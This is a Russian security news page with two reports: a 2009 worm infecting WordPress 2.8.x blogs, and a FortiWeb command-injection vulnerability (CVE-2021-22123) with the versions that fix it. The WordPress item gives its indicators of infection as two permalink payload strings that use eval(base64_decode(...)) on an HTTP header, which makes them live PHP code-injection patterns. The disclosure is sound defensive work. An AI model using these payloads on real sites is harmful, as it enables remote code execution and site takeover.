Массовое заражение блогов на WordPress

Месяц назад стало известно о новой критической уязвимости в WordPress 2.8.3, позволяющей легко изменить администраторский пароль в удалённом режиме. После этого вышел WordPress 2.8.4, устраняющий эту уязвимость. Однако, как оказалось, далеко не все блогеры следят за обновлениями.

В эти выходные разразилась настоящая эпидемия нового вируса, поражающего блоги на движке WordPress 2.8.3 и более ранних версий в ветке 2.8.

Червь регистрируется в блоге, запускает вредоносный код через структуру permalink и делает себя вторым админом, потом запускает скрипт для стирания себя со страницы пользователей и начинает добавлять спам и ссылки на вредоносный контент в архивные топики.

Присутствие вредителя довольно сложно обнаружить сразу, тем более если он ещё ничего не опубликовал. Для этого нужно проверить фид permalinks/rss на присутствие следующего кода.

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

или ошибки

‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’

Если есть такой код или фид сломан, то блог инфицирован.

Процедура удаления червя представляет собой нетривиальную задачу .

источник 

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

В Fortinet FortiWeb устранили уязвимость, позволяющую внедрить команды

Компания Fortinet устранила уязвимость в своем межсетевом экране FortiWeb, предназначенном для защиты веб-приложений от веб-атак, и поблагодарила эксперта Positive Technologies Андрея Медова, выявившего проблему.

Ошибка получила идентификатор CVE-2021-22123 и оценку 7,4 по шкале CVSSv3, что соответствует высокому уровню опасности.

«Уязвимость внедрения команд в интерфейсе управления FortiWeb может позволить удаленному злоумышленнику, прошедшему проверку подлинности, выполнять произвольные команды в системе через страницу конфигурации сервера SAML, — объясняет Андрей Медов. — Выполнение команд с максимальными привилегиями приведет к получению атакующим полного контроля над сервером. Если же в результате неправильной настройки интерфейс администрирования межсетевого экрана окажется доступен в интернете, а сам продукт не будет обновлен до последних версий, то комбинация CVE-2021-22123 и обнаруженной нами ранее ошибки CVE-2020-29015 может позволить атакующему проникнуть во внутреннюю сеть».

Для устранения уязвимости нужно обновить FortiWeb 6.3.7 (и ниже), 6.2.3 (и ниже), 6.1.x, 6.0.x, 5.9.x до версий 6.3.8 или 6.2.4 (в зависимости от используемой редакции продукта).

В феврале 2021 года Fortinet закрыла четыре уязвимости в FortiWeb, выявленные Андреем Медовым.

Автоматизировать обнаружение и приоритизацию подобных уязвимостей позволяют системы управления уязвимостями, такие как MaxPatrol VM. Выявить признаки проникновения (например, в случае невозможности установки обновления) помогут системы класса SIEM (в частности, MaxPatrol SIEM), которые позволяют выявить подозрительное поведение на сервере, зарегистрировать инцидент и своевременно остановить продвижение злоумышленников внутри корпоративной сети.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru